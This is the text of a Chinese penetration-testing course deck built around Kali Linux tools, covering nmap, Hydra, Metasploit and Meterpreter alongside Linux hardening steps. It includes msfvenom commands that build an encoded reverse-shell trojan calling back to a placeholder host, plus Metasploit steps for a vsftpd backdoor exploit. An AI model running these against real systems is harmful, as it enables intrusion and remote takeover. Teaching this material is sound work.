網(wǎng)絡(luò)安全滲透測試與防護(hù) 課件全套 1 初識(shí) Kali Linux操作系統(tǒng) -19 Aircrack-ng 工具_(dá)第1頁
網(wǎng)絡(luò)安全滲透測試與防護(hù) 課件全套 1 初識(shí) Kali Linux操作系統(tǒng) -19 Aircrack-ng 工具_(dá)第2頁
網(wǎng)絡(luò)安全滲透測試與防護(hù) 課件全套 1 初識(shí) Kali Linux操作系統(tǒng) -19 Aircrack-ng 工具_(dá)第3頁
網(wǎng)絡(luò)安全滲透測試與防護(hù) 課件全套 1 初識(shí) Kali Linux操作系統(tǒng) -19 Aircrack-ng 工具_(dá)第4頁
網(wǎng)絡(luò)安全滲透測試與防護(hù) 課件全套 1 初識(shí) Kali Linux操作系統(tǒng) -19 Aircrack-ng 工具_(dá)第5頁
已閱讀5頁,還剩105頁未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡介

初識(shí)KaliLinux介紹KaliLinux熟悉KaliLinux常用工具目錄介紹KaliLinux介紹KaliLinuxKaliLinux是一款基于Debian的Linux操作系統(tǒng),由BackTrack發(fā)展而來,專門為滲透測試和數(shù)字取證而設(shè)計(jì)。它集成了超過300種滲透測試工具,如密碼破解工具、漏洞掃描工具、網(wǎng)絡(luò)嗅探工具、無線網(wǎng)絡(luò)工具等,旨在實(shí)現(xiàn)高級(jí)滲透測試和安全審計(jì)。熟悉KaliLinux常用工具熟悉KaliLinux常用工具nmap被稱為諸神之眼,一款開源的網(wǎng)絡(luò)掃描工具,用于偵察和掃描網(wǎng)絡(luò),幫助識(shí)別目標(biāo)系統(tǒng)的開放端口和服務(wù)。熟悉KaliLinux常用工具Nessus是一個(gè)知名的漏洞掃描工具,它提供了完整的電腦漏洞掃描服務(wù),并隨時(shí)更新其漏洞數(shù)據(jù)庫,以確保能夠識(shí)別并報(bào)告最新的安全威脅。熟悉KaliLinux常用工具SQLMap是一款自動(dòng)化的SQL注入滲透工具,主要功能是對(duì)給定的URL進(jìn)行掃描,發(fā)現(xiàn)并利用其中的SQL注入漏洞。熟悉KaliLinux常用工具Hydra是一款開源的暴力密碼破解工具,如果你正在尋找一個(gè)有趣的工具來破解登錄密碼,Hydra將是KaliLinux預(yù)裝的最好的工具之一。熟悉KaliLinux常用工具Kismet是KaliLinux預(yù)裝的開源工具,用于無線網(wǎng)絡(luò)探測、嗅探和入侵檢測。它采用被動(dòng)嗅探技術(shù),無需連接網(wǎng)絡(luò)即可監(jiān)測和識(shí)別無線設(shè)備,支持實(shí)時(shí)和離線數(shù)據(jù)分析。熟悉KaliLinux常用工具M(jìn)etasploit在網(wǎng)絡(luò)安全領(lǐng)域具有重要的作用,它是一款開源的網(wǎng)絡(luò)安全評(píng)估工具,主要用于發(fā)現(xiàn)、驗(yàn)證并利用網(wǎng)絡(luò)系統(tǒng)中的漏洞。Vmware虛擬機(jī)接入網(wǎng)絡(luò)的三種模式Bridged(橋接模式)NAT(網(wǎng)絡(luò)地址轉(zhuǎn)換模式)Host-Only(僅主機(jī)模式)目錄運(yùn)作原理應(yīng)用場景優(yōu)勢劣勢Bridged(橋接模式)Bridged(橋接模式)機(jī)房網(wǎng)絡(luò)環(huán)境A主機(jī)WindowsIP地址:42虛擬機(jī)Linux系統(tǒng)IP地址:50虛擬機(jī)Linux系統(tǒng)IP地址:50B主機(jī)WindowsIP地址:43NAT(網(wǎng)絡(luò)地址轉(zhuǎn)換模式)NAT(網(wǎng)絡(luò)地址轉(zhuǎn)換模式)機(jī)房網(wǎng)絡(luò)環(huán)境A主機(jī)WindowsIP地址:42虛擬機(jī)Linux系統(tǒng)IP地址:DHCPB主機(jī)WindowsIP地址:43ETH0VM8VM0ETH0互聯(lián)網(wǎng)NAT模式Host-Only(僅主機(jī)模式)Host-Only(僅主機(jī)模式)機(jī)房網(wǎng)絡(luò)環(huán)境A主機(jī)WindowsIP地址:42虛擬機(jī)Linux系統(tǒng)IP地址:虛擬機(jī)Linux系統(tǒng)IP地址:0B主機(jī)WindowsIP地址:43配置IP地址sudo使用配置文件Ping參數(shù)目錄允許普通用戶執(zhí)行一些或者全部root命令的工具/etc/network/interfaces-c使用apt-get安裝軟件dpkg命令安裝----------需要用戶自行處理軟件間的問題apt-get進(jìn)行安裝-------自動(dòng)處理目錄配置過程1、修改Apt源文件,將Kali官方源進(jìn)行了注釋,并新增了中科大Kali源的內(nèi)容。配置過程2、隨后,我們執(zhí)行了以下命令來更新軟件包列表和升級(jí)系統(tǒng):sudoapt-getupdate#更新軟件包列表,確保獲取到最新的軟件源信息sudoapt-getupgrade#升級(jí)所有可升級(jí)的軟件包,保持系統(tǒng)更新和安全配置過程3、最后,我們介紹了如何使用apt-get命令來安裝指定的軟件包:sudoapt-getinstall<package_name>#安裝指定的軟件包,增強(qiáng)系統(tǒng)的功能NMAP簡介NMAP是什么NMAP使用的方法NMAP掃描的方式及參數(shù)目錄NMAP是什么NMAP(網(wǎng)絡(luò)映射器)是NetworkMapper的簡稱,是由GordonLyon設(shè)計(jì),用來探測計(jì)算機(jī)網(wǎng)絡(luò)上的主機(jī)和服務(wù)的一種免費(fèi)開放的安全掃描器,該工具成為最為流行安全必備工具之一,其基本功能包括:(1)主機(jī)發(fā)現(xiàn)(HostDiscovery),探測網(wǎng)絡(luò)上的主機(jī)是否在線。(2)端口掃描(PortScanning),探測主機(jī)所啟用的網(wǎng)絡(luò)服務(wù)。(3)版本偵測(VersionDetection),探測目標(biāo)主機(jī)的網(wǎng)絡(luò)服務(wù),判斷其服務(wù)名稱及版本號(hào)。(4)操作系統(tǒng)偵測(OperatingSystemDetection),推斷目標(biāo)主機(jī)所用的操作系統(tǒng)。此外,NMAP還提供腳本引擎,可以利用其進(jìn)行漏洞檢測。NMAP使用方法NMAP使用簡單,其命令是:nmap

[ScanType(s)]

[Options]

<targetspecification>掃描方式掃描參數(shù)掃描目標(biāo)掃描方式表2-1NMAP的主要掃描方式掃描方式參數(shù)描述Ping掃描-sP只探測主機(jī)是否在線TCPConnect掃描-sT調(diào)用connect()函數(shù)確定目標(biāo)是否啟用端口,建立三次握手,在服務(wù)器端會(huì)留下日志。TCPSYN掃描-sS發(fā)送TCPSYN數(shù)據(jù)包確定目標(biāo)是否啟用端口,沒有建立連接,不會(huì)留下記錄。FIN掃描-sF發(fā)送FIN數(shù)據(jù)包,確定目標(biāo)是否啟用端口,若端口開放,目標(biāo)主機(jī)不回復(fù),若端口關(guān)閉,目標(biāo)主機(jī)回復(fù)。ACK掃描-sA掃描主機(jī)向目標(biāo)主機(jī)發(fā)送ACK標(biāo)識(shí)包,從返回信息中的TTL值得出端口開放信息。UDP掃描-sU向目標(biāo)主機(jī)發(fā)送UDP包,判斷端口是否開放掃描參數(shù)表2-2NMAP的常用掃描參數(shù)參數(shù)簡要描述示例與說明-P選擇掃描的端口范圍如:-p21-150,-p139,445-O獲得目標(biāo)的操作系統(tǒng)類型通過TCP/IP指紋識(shí)別系統(tǒng)類型-sV服務(wù)版本探測指應(yīng)用軟件系統(tǒng)的版本-A激烈掃描,同時(shí)打開OS指紋識(shí)別和版本探測常被稱為萬能開關(guān)-S欺騙掃描,偽裝源IP地址如:nmap-sS-eeth0-S0-v輸出掃描過程的詳細(xì)信息-D使用誘餌方法進(jìn)行掃描把掃描IP地址夾雜在誘餌主機(jī)中-F快速掃描-p0在掃描之前不PING主機(jī)-PI發(fā)送ICMP包判斷主機(jī)是否存活-PT即使目標(biāo)網(wǎng)絡(luò)阻塞了PING包,仍對(duì)目標(biāo)進(jìn)行掃描常使用-PT80NMAP腳本引擎使用Nmap腳本引擎定義Nmap腳本目錄Nmap腳本引擎定義Nmap腳本引擎(NSE)是Nmap工具中一個(gè)強(qiáng)大的組件,它允許用戶編寫和共享簡單的腳本(通常使用lua編程語言)來自動(dòng)化各種網(wǎng)絡(luò)任務(wù)。這些腳本能夠大幅擴(kuò)展Nmap的功能,執(zhí)行更復(fù)雜的掃描和評(píng)估任務(wù),如檢測漏洞、執(zhí)行安全審計(jì)、收集信息等。Nmap腳本引擎命令行參數(shù)相關(guān)命令行參數(shù)如下:-sC:等價(jià)于--script=default,使用默認(rèn)類別的腳本進(jìn)行掃描--script=<腳本名稱>/<類名稱>使用某個(gè)或某類腳本進(jìn)行掃描,支持通配符描述,在使用通配符時(shí),腳本的參數(shù)需要用雙引號(hào)引起來。如--script“http-*”--script-args=<n1=v1,[n2=v2,...]>:為腳本提供默認(rèn)參數(shù)--script-args-file=filename:使用文件來為腳本提供參數(shù)--script-trace:顯示腳本執(zhí)行過程中發(fā)送與接收的數(shù)據(jù)--script-updatedb:更新腳本數(shù)據(jù)庫--script-help=<scripts>:顯示腳本的幫助信息,其中<scripts>部分可以逗號(hào)分隔的文件或腳本類別。Nmap腳本分類表類別名稱描述腳本舉例auth負(fù)責(zé)處理鑒權(quán)證書(繞開鑒權(quán))的腳本http-vuln-cve2010-0738broadcast在局域網(wǎng)內(nèi)探查更多服務(wù)開啟狀況,如dhcp/dns/sqlserver等服務(wù)broadcast-pingbrute提供暴力破解方式,針對(duì)常見的應(yīng)用如http/snmp等mysql-brutedefault使用-sC或-A選項(xiàng)掃描時(shí)候默認(rèn)的腳本,提供基本腳本掃描能力smb-os-discoverydiscovery發(fā)現(xiàn)更多的網(wǎng)絡(luò)信息,如SMB枚舉、SNMP查詢等http-php-versionexploit利用已知的漏洞入侵系統(tǒng)ftp-vsftpd-backdoorvuln負(fù)責(zé)檢查目標(biāo)機(jī)是否有常見的漏洞(Vulnerability)smb-vuln-ms10-054表2-1Nmap腳本分類表Nessus掃描器Nessus定義Nessus特點(diǎn)Nessus安裝步驟目錄Nessus定義Nessus是一款廣泛使用的網(wǎng)絡(luò)漏洞掃描器,由TenableNetworkSecurity開發(fā)和維護(hù)。它用于自動(dòng)化地掃描網(wǎng)絡(luò)設(shè)備、計(jì)算機(jī)系統(tǒng)以及軟件應(yīng)用程序等,以發(fā)現(xiàn)存在的安全漏洞和配置錯(cuò)誤。Nessus使用一系列預(yù)定義的漏洞檢測規(guī)則和模式,對(duì)目標(biāo)系統(tǒng)進(jìn)行全面掃描,并提供漏洞的詳細(xì)描述、風(fēng)險(xiǎn)評(píng)估以及建議的修復(fù)措施。此外,它還可以執(zhí)行漏洞利用嘗試,以驗(yàn)證系統(tǒng)的安全性,并識(shí)別可能導(dǎo)致系統(tǒng)遭受攻擊的弱點(diǎn)。Nessus特點(diǎn)Nessus具有以下特點(diǎn):(1)提供完整的漏洞庫,并隨時(shí)更新。(2)基于B/S模式,使用方便。(3)跨平臺(tái)支持,既可運(yùn)行在Windows系統(tǒng),也可運(yùn)行在類Unix系統(tǒng)。(4)掃描代碼與漏洞數(shù)據(jù)相互獨(dú)立,Nessus針對(duì)每一個(gè)漏洞有一個(gè)對(duì)應(yīng)的插件,漏洞插件是用NASL(NessusAttackScriptingLanguage)編寫的一小段模擬攻擊漏洞的代碼,極大的方便了漏洞數(shù)據(jù)的維護(hù)、更新。(5)具有掃描任意端口任意服務(wù)的能力。(6)以用戶指定的格式(ASCII文本、html等)產(chǎn)生詳細(xì)的輸出報(bào)告,包括目標(biāo)的脆弱點(diǎn)、怎樣修補(bǔ)漏洞以防止黑客入侵及危險(xiǎn)級(jí)別。暴力破解工具h(yuǎn)ydrahydra定義hydra命令hydra工具目錄hydra定義Hydra,俗稱九頭蛇,是一款非常強(qiáng)大的開源的暴力破解工具,支持多種服務(wù)協(xié)議的賬號(hào)和密碼進(jìn)行爆破,包括Telnet,SSH(v1和v2),RDP,F(xiàn)TP,MS-SQL,MYSQL,SMB,SMTP,POP3,HTTP等,可以運(yùn)行在Linux、Windows、Mac等平臺(tái)。hydra命令運(yùn)行hydra的命令如下:hydra[[[-lLOGIN|-LFILE][-pPASS|-PFILE]]|[-CFILE]][-ensr][-oFILE][-tTASKS][-MFILE[-TTASKS]][-wTIME][-f][-sPORT][-S][-vV]service://server[:port]Hydra常見參數(shù)參數(shù)簡要描述備注-l指定用戶名二選一-L指定用戶名字典(文件)-p指定密碼破解二選一-P指定密碼字典(文件)-C用戶名密碼可以用:分割(username:password)可以代替-lusername-ppassword-en空密碼探測-es用戶名和密碼一致如用戶名和密碼均為root-er以用戶名反轉(zhuǎn)方式如用戶名為root,密碼為toor-o輸出文件-f在找到用戶名或密碼時(shí)退出-t指定多線程數(shù)量,默認(rèn)為16個(gè)線程弱口令規(guī)則設(shè)置口令的時(shí)候盡量遵循如下的原則:(1)口令不少于8個(gè)字符(2)同時(shí)包含英文字母、數(shù)字和特殊符號(hào)(3)不包含完整的字典詞匯(4)不包含用戶名、真實(shí)姓名、公司名稱和生日等。Metasploit開源框架Metasploit的基本概念Metasploit中的常用術(shù)語利用Metasploit進(jìn)行漏洞掃描目錄Metasploit的基本概念MetasploitFramework(MSF)是在2003年以開放源碼方式發(fā)布,可以自由獲取的開發(fā)框架,它為滲透測試、shellcode編寫和漏洞研究提供了一個(gè)可靠平臺(tái)。其本身附帶數(shù)百個(gè)已知軟件漏洞的專業(yè)級(jí)漏洞攻擊工具,可以集成nmap、nessus等開源的漏洞掃描工具,通過它可以很容易地獲取、開發(fā)并對(duì)計(jì)算機(jī)軟件漏洞實(shí)施攻擊。MSF常用來發(fā)現(xiàn)漏洞、驗(yàn)證漏洞,幫助安全和IT專業(yè)人士識(shí)別安全性問題Metasploit中的常用術(shù)語(1)Exploit(滲透攻擊)指入侵者或滲透測試者利用系統(tǒng)、應(yīng)用或服務(wù)中的安全漏洞進(jìn)行的攻擊行為。(2)Payload(攻擊載荷)是系統(tǒng)在被滲透攻擊之后所執(zhí)行的代碼,在metasploit框架中可以自由的選擇、傳送和植入。(3)Shellcode(shell代碼)是在滲透攻擊時(shí),作為攻擊載荷運(yùn)行的一組機(jī)器指令。其通常用匯編語言編寫,大多數(shù)情況下,目標(biāo)系統(tǒng)執(zhí)行了shellcode這一組指令之后,才會(huì)提供一個(gè)命令行shell或者meterpretershell。(4)Module(模塊)是指metasploit框架中所使用的一段軟件代碼組件。常分為滲透攻擊模塊(exploitmodule)、輔助模塊(auxiliarymodule)。Metasploit的使用接口MSF終端(msfconsole)是metasploit框架的流行用戶接口,靈活易用。通過msfconsole命令,可輕松啟動(dòng)MSF框架并進(jìn)入控制臺(tái)。在MSF控制臺(tái)中常用的命令如下:Help:查看執(zhí)行命令的幫助信息

Use:加載相應(yīng)的模塊Set:設(shè)置參數(shù)

Run:啟動(dòng)滲透攻擊過程Search:搜索特定的模塊

Show:顯示指定信息Sessions:會(huì)話管理

Back:退到上一級(jí)Exit:退出msfconsoleMSF控制臺(tái)中滲透步驟在MSF控制臺(tái)中滲透測試的主要步驟如下:(1)使用search命令搜索需要的模塊,如:

Msf>searchvsftp(2)使用use命令加載相應(yīng)模塊,如:

Use exploit/unix/ftp/vsftpd_234_backdoor(3)使用showoptions命令查看參數(shù)(4)使用set命令設(shè)置參數(shù)

SetRHOST30(5)使用exploit或者run啟動(dòng)滲透測試流程。臟牛漏洞臟牛漏洞的定義臟牛漏洞的復(fù)現(xiàn)目錄臟牛漏洞定義臟牛(DirtyCOW)漏洞編號(hào)為CVE-2016-5195,是一種本地提權(quán)漏洞。該漏洞是由于COW((Copy-on-Write))機(jī)制的實(shí)現(xiàn)問題導(dǎo)致的。具體來說,該漏洞利用了Copy-on-Write機(jī)制中的一個(gè)競態(tài)條件(RaceCondition),攻擊者可以利用這個(gè)競態(tài)條件來獲取對(duì)一個(gè)本來只讀的文件的寫權(quán)限,從而提升為本地管理員權(quán)限。黑客可以通過遠(yuǎn)程入侵獲取低權(quán)限用戶后,在服務(wù)器上利用該漏洞上實(shí)現(xiàn)本地提權(quán),從而獲取到服務(wù)器root權(quán)限。COW技術(shù)的原理及其存在的競態(tài)條件漏洞COW技術(shù)是為了節(jié)省內(nèi)存和提高效率。當(dāng)多個(gè)進(jìn)程需要讀取同一個(gè)文件時(shí),它們會(huì)共享這個(gè)文件的內(nèi)存映射,而不是每個(gè)進(jìn)程都復(fù)制一份。這樣,當(dāng)進(jìn)程只是讀取文件時(shí),它們都在看同一個(gè)內(nèi)存區(qū)域。但如果有進(jìn)程想要修改文件,此時(shí)系統(tǒng)會(huì)為該進(jìn)程復(fù)制一份這個(gè)文件的內(nèi)存映射,讓它在復(fù)制的副本上進(jìn)行修改,這樣就不會(huì)影響其他進(jìn)程。然而,在復(fù)制和修改的過程中,存在一個(gè)時(shí)間窗口。在這個(gè)時(shí)間窗口內(nèi),如果有多個(gè)進(jìn)程幾乎同時(shí)嘗試修改文件,并且有一個(gè)惡意進(jìn)程搶在其他進(jìn)程之前修改了原始文件,那么原始文件就會(huì)被這個(gè)惡意進(jìn)程篡改。其他進(jìn)程看到的仍然是原始文件的共享映射,但它們可能會(huì)因?yàn)閻阂膺M(jìn)程的修改而受到影響,這就是所謂的競態(tài)條件漏洞。臟牛漏洞復(fù)現(xiàn)步驟1、檢查目標(biāo)主機(jī)是否存在臟牛漏洞2、下載并編譯PoC文件3、在終端模式下執(zhí)行dirty文件實(shí)現(xiàn)提權(quán)操作AWK工具的使用AWK定義AWK命令目錄AWK定義AWK是Linux系統(tǒng)中一個(gè)強(qiáng)大的文本分析工具,其取了三位創(chuàng)始人AlfredAho,PeterWeinberger和BrianKernighan的FamilyName的首字符,它把文件件逐行地讀入,將一行分成數(shù)個(gè)字段(一段字符串)進(jìn)行處理。AWK具有自己的語言,允許用戶創(chuàng)建簡短的程序來讀取輸入文件、為數(shù)據(jù)排序、處理數(shù)據(jù)、執(zhí)行計(jì)算以及生成報(bào)表等。這些程序可以非常靈活,能夠?qū)崿F(xiàn)相當(dāng)復(fù)雜的文本操作,被廣泛應(yīng)用于Shell腳本中,以完成各種自動(dòng)化配置任務(wù)。AWK命令A(yù)WK的命令格式為:awk[參數(shù)][處理內(nèi)容][操作對(duì)象]其中常用參數(shù)-F用來指定輸入分割符,如-F“:”代表以“:”分隔,默認(rèn)是以空格符號(hào)分隔。處理內(nèi)容部分要用單引號(hào)括起來,其中的命令要用{}括起來。其中常用的命令是print,即打印。在處理部分可以加入正則表達(dá)式,滿足條件則執(zhí)行命令。AWK預(yù)定義命令A(yù)WK也是一種處理文本文件的語言,在其中預(yù)定義了一些變量,如:$0代表當(dāng)前行(相當(dāng)于匹配所有),$1代表分隔后的第一列(字段)等;數(shù)學(xué)運(yùn)算符、邏輯關(guān)系符、比較操作符、內(nèi)置函數(shù)、if和for循環(huán)等。Linux系統(tǒng)安全加固要求Linux系統(tǒng)安全加固的四個(gè)方面目錄Linux系統(tǒng)安全加固1、從賬戶口令方面對(duì)Linux系統(tǒng)進(jìn)行安全加固安全加固項(xiàng)目說明賬戶口令安全禁用不需要的系統(tǒng)賬號(hào)檢查系統(tǒng)賬號(hào)和口令,禁止使用空口令賬號(hào)檢查系統(tǒng)賬號(hào)和口令,檢查是否存在UID為0的賬號(hào)設(shè)置賬號(hào)超時(shí)自動(dòng)注銷限制root遠(yuǎn)程登錄系統(tǒng)密碼策略應(yīng)符合必要強(qiáng)度Linux系統(tǒng)安全加固檢查項(xiàng)執(zhí)行命令加固措施列出空密碼賬號(hào)sudoawk-F“:”‘($2==””){print$1}’/etc/shadow刪除不必要帳戶并修改空密碼或者簡單密碼為復(fù)雜密碼。列出uid為0的賬號(hào)sudoawk-F“:”‘($3==0){print$1}’/etc/passwd如果非必要僅保留root用戶的uid為0檢查賬號(hào)超時(shí)自動(dòng)注銷cat/etc/profile|grepTMOUT如輸出為空,說明未設(shè)置。sudovi/etc/profile在其中增加exportTMOUT=600限制root用戶遠(yuǎn)程登錄more/etc/securetty的console參數(shù)sudovi/etc/securetty在其中配置:console=/dev/tty01Linux系統(tǒng)安全加固2、從系統(tǒng)服務(wù)安全方面對(duì)Linux系統(tǒng)進(jìn)行安全加固安全加固項(xiàng)說明系統(tǒng)服務(wù)安全禁用或刪除不必要的服務(wù)及時(shí)更新和修補(bǔ)操作系統(tǒng)及服務(wù)的軟件版本Linux系統(tǒng)安全加固檢查項(xiàng)ubuntu系列RedHat系列檢查及停止系統(tǒng)服務(wù)service--status-all//檢查serviceservice-namestop//停止systemctllist-unit-files//檢查systemctlstopname.service//停止更新系統(tǒng)服務(wù)版本apt-getupgrade<軟件包名稱>yumupdate<軟件包名稱>Linux系統(tǒng)安全加固3、從文件系統(tǒng)安全方面對(duì)Linux系統(tǒng)進(jìn)行安全加固安全加固項(xiàng)說明文件系統(tǒng)安全檢查系統(tǒng)umask設(shè)置檢查關(guān)鍵文件的屬性,把重要文件加上不可修改屬性檢查關(guān)鍵文件的權(quán)限Linux系統(tǒng)安全加固檢查項(xiàng)執(zhí)行命令加固措施檢查系統(tǒng)umask設(shè)置cat/etc/profile|grepumask使用命令“sudovi/etc/profile”修改配置文件,將umask022修改為umask027,即新創(chuàng)建的文件屬主讀寫執(zhí)行權(quán)限,同組用戶讀和執(zhí)行權(quán)限,其他用戶無權(quán)限。檢查關(guān)鍵文件的屬性把重要文件加上不可修改屬性sudochattr+i/etc/passwdsudochattr+i/etc/shadowsudochattr+i/etc/gshadowsudochattr+i/etc/group檢查關(guān)鍵文件的權(quán)限ls–la/etc/shadowls–la/etc/xinetd.confls–la/etc/grub.confchmod+400/etc/shadowchomd+600/etc/xinetd.confchomd+600/etc/grub.confLinux系統(tǒng)安全加固4、從日志審核方面對(duì)Linux系統(tǒng)進(jìn)行安全加固安全加固項(xiàng)說明日志審核應(yīng)該開啟日志審核功能Linux系統(tǒng)安全加固檢查項(xiàng)ubuntu系列RedHat系列檢查方法servicesyslogstatussystemctlstatusrsyslog啟用方法servicesyslogstartsystemctlstartrsyslogMetasploit框架之MeterpreterMeterpreter簡介Meterpreter常用命令目錄Meterpreter簡介Meterpreter是攻擊載荷在觸發(fā)漏洞后返回給metasploit框架的一個(gè)控制通道,是Metasploit框架的殺手锏,常被稱為“黑客的瑞士軍刀”。meterpreter是Metasploit框架的一個(gè)擴(kuò)展模塊,可以調(diào)用Metasploit的一些功能,對(duì)目標(biāo)系統(tǒng)進(jìn)行更為深入的滲透。Meterpreter是一種后滲透工具,其工作在純內(nèi)存模式,可以反追蹤,通過Meterpreter會(huì)話,可以進(jìn)行獲取密碼哈希值、特權(quán)提升、跳板攻擊等。Meterpreter常用命令Meterpreter的一些常用命令如下:help:查看幫助信息shell:允許用戶在入侵主機(jī)上(指windows主機(jī))運(yùn)行windowsshell命令run:運(yùn)行一段meterpreter腳本或后滲透模塊download:允許用戶從入侵主機(jī)上下載文件upload:允許用戶上傳文件到入侵主機(jī)execute:允許用戶在入侵主機(jī)上執(zhí)行命令sessions–i:允許用戶切換會(huì)話background:允許用戶在后臺(tái)運(yùn)行meterpreter會(huì)話。Meterpreter的功能和特點(diǎn)1.強(qiáng)大的遠(yuǎn)程控制能力:Meterpreter可以讓黑客遠(yuǎn)程控制受感染的計(jì)算機(jī)、執(zhí)行各種操作,如上傳和下載文件、執(zhí)行系統(tǒng)命令、監(jiān)控系統(tǒng)狀態(tài)等。2.跨平臺(tái)支持:Meterpreter可以在Windows、Linux、MacOS等各種操作系統(tǒng)上運(yùn)行,使得黑客可以利用它進(jìn)行跨平臺(tái)攻擊,極大地?cái)U(kuò)大了攻擊面。3.多種功能模塊:Meterpreter內(nèi)置了許多功能模塊,包括文件傳輸模塊、系統(tǒng)命令執(zhí)行模塊、滲透測試模塊等,可以滿足黑客在攻擊過程中的各種需求。4.隱蔽性高:Meterpreter具有較高的隱蔽性,可以避開常規(guī)的殺毒軟件和防火墻的檢測,使得黑客的攻擊更為隱蔽和有效。5.易于擴(kuò)展:Meterpreter的功能可以通過編寫自定義的擴(kuò)展模塊進(jìn)行擴(kuò)展,使得其應(yīng)用范圍更加廣泛和靈活。Meterpreter的使用場景1.黑客攻擊:惡意黑客可以利用Meterpreter對(duì)受感染的計(jì)算機(jī)進(jìn)行遠(yuǎn)程控制,竊取敏感信息、植入惡意軟件、進(jìn)行勒索等多種活動(dòng)。2.安全測試:安全從業(yè)人員可以利用Meterpreter對(duì)網(wǎng)絡(luò)系統(tǒng)進(jìn)行滲透測試,評(píng)估系統(tǒng)的安全性,并挖掘系統(tǒng)的漏洞和弱點(diǎn)。3.系統(tǒng)維護(hù):系統(tǒng)管理員可以利用Meterpreter對(duì)遠(yuǎn)程計(jì)算機(jī)進(jìn)行故障診斷、系統(tǒng)監(jiān)控和維護(hù)管理,提高系統(tǒng)的穩(wěn)定性和安全性。Meterpreter的防范和防御1.加強(qiáng)安全意識(shí):用戶需要加強(qiáng)對(duì)網(wǎng)絡(luò)安全的意識(shí),不輕易點(diǎn)擊可疑信息和下載未知軟件,避免收到惡意軟件的感染。2.安裝安全防護(hù)軟件:用戶需要安裝和及時(shí)更新系統(tǒng)的殺毒軟件、防火墻等安全防護(hù)軟件,提高系統(tǒng)的安全性。3.加強(qiáng)訪問控制:系統(tǒng)管理員需要加強(qiáng)對(duì)網(wǎng)絡(luò)系統(tǒng)的訪問控制,設(shè)置復(fù)雜的密碼和訪問權(quán)限,限制用戶的操作權(quán)限,防止遠(yuǎn)程攻擊。4.及時(shí)更新補(bǔ)丁:及時(shí)更新系統(tǒng)的安全補(bǔ)丁和軟件更新,修復(fù)系統(tǒng)的漏洞和弱點(diǎn),提高系統(tǒng)的安全防護(hù)能力。Windowssc工具SC工具介紹SC工具使用語法及命令目錄SC工具介紹SC工具是一款在Windows操作系統(tǒng)中廣泛應(yīng)用的命令行工具,它主要用于與服務(wù)控制管理器和服務(wù)進(jìn)行通信。SC工具的功能強(qiáng)大且靈活,使得系統(tǒng)管理員和IT專業(yè)人員能夠輕松管理本地或遠(yuǎn)程計(jì)算機(jī)上的服務(wù)。服務(wù)是Windows操作系統(tǒng)中的一個(gè)重要組件,它們是在后臺(tái)運(yùn)行的可執(zhí)行應(yīng)用程序,可以長時(shí)間運(yùn)行且不顯示用戶界面。通過服務(wù),可以實(shí)現(xiàn)諸如自動(dòng)啟動(dòng)應(yīng)用程序、定期執(zhí)行特定任務(wù)、管理系統(tǒng)資源等功能。SC工具允許用戶創(chuàng)建、刪除、修改和查詢這些服務(wù),從而實(shí)現(xiàn)對(duì)系統(tǒng)的精細(xì)化管理和優(yōu)化。SC使用語法SC[Servername]commandServicename[Optionname=Optionvalues]Servername可選擇:可以使用雙斜線,如\\myserver,也可以是\\23來操作遠(yuǎn)程計(jì)算機(jī)。如果在本地計(jì)算機(jī)上操作就不用添加任何參數(shù)。SC使用語法SC[Servername]commandServicename[Optionname=Optionvalues]常用Command命令:config改變一個(gè)服務(wù)的配置。(長久的)create創(chuàng)建一個(gè)服務(wù)。(增加到注冊(cè)表中)delete刪除一個(gè)服務(wù)。(從注冊(cè)表中刪除)qc詢問一個(gè)服務(wù)的配置。query詢問一個(gè)服務(wù)的狀態(tài),也可以列舉服務(wù)的狀態(tài)類型。start啟動(dòng)一個(gè)服務(wù)。stop對(duì)一個(gè)服務(wù)送出一個(gè)停止的要求。SC使用語法SC[Servername]commandServicename[Optionname=Optionvalues]Servicename,在注冊(cè)表中為servicekey制定的名稱。注意這個(gè)名稱不同于顯示名稱的(這個(gè)名稱可以用netstart和服務(wù)控制面板看到),而SC是使用服務(wù)鍵名來鑒別服務(wù)的。SC使用語法SC[Servername]commandServicename[Optionname=Optionvalues]Optionname和optionvalues參數(shù)允許你指定操作命令參數(shù)的名稱和數(shù)值。需要注意,在操作名稱和等號(hào)之間沒有空格,而等號(hào)與optionvalues之間需要一個(gè)空格Metasploit框架之MsfvenomMsfvenom的定義Msfvenom常用參數(shù)Msfvenom運(yùn)行命令目錄Msfvenom的定義Msfvenom是Metasploit框架中的一個(gè)關(guān)鍵工具,它主要用于生成和自定義惡意軟件。具體來說,Msfvenom具有生成針對(duì)不同操作系統(tǒng)和應(yīng)用程序的惡意代碼的能力,如木馬、后門、惡意軟件等。這些payload可以被用于滲透測試、漏洞利用以及安全研究等多個(gè)方面。從更深層次來看,Msfvenom實(shí)際上是msfpayload(攻擊載荷)和msfencode(編碼加密)的組合,將這兩個(gè)工具集成在一個(gè)框架實(shí)例中。自2015年6月8日起,msfvenom就替換了msfpayload和msfencode,成為Metasploit框架中用于生成惡意軟件的工具之一。msfvenom常用參數(shù)參數(shù)描述-l,--list<type>列出指定模塊的所有可用資源.模塊類型包括:payloads,encoders,nops,......all-p,--payload<payload>指定需要使用的payload(攻擊荷載)。幾乎是支持全平臺(tái)的-f,--format<format>指定輸出格式-o,--out<path>指定創(chuàng)建好的payload的存放位置-a,--arch<architecture>指定payload的目標(biāo)架構(gòu),例如x86還是x64還是x86_64Msfvenom運(yùn)行命令(1)普通生成適宜于在64位windows操作系統(tǒng)上運(yùn)行的反彈木馬的命令msfvenom-pwindows/x64/meterpreter/reverse_tcplhost=x.x.x.xlport=4444-fexe-o/root/shell.exe(2)編碼生成宜于在64位windows操作系統(tǒng)上運(yùn)行的反彈木馬的命令msfvenom-pwindows/x64/meterpreter/reverse_tcplhost=x.x.x.xlport=4444-ex86/shikata_ga_nai-fexe-o/root/shell.exe。社會(huì)工程學(xué)工具包SET社會(huì)工程學(xué)工具包SET概述SET的使用方法SET應(yīng)用場景SET防范措施目錄社會(huì)工程學(xué)工具包SET概述我們?cè)谌蝿?wù)4-4中用msf框架的擴(kuò)展模塊msfvenom生成了反彈木馬,實(shí)際上在KaliLinux中還集成了社會(huì)工程學(xué)工具包SET(Social-EngineerToolkit)。SET是一款專門用于進(jìn)行社會(huì)工程學(xué)攻擊的開源工具集,最初由著名的網(wǎng)絡(luò)安全專家DavidKennedy創(chuàng)造并開源,包含了眾多社會(huì)工程學(xué)攻擊模塊,如欺騙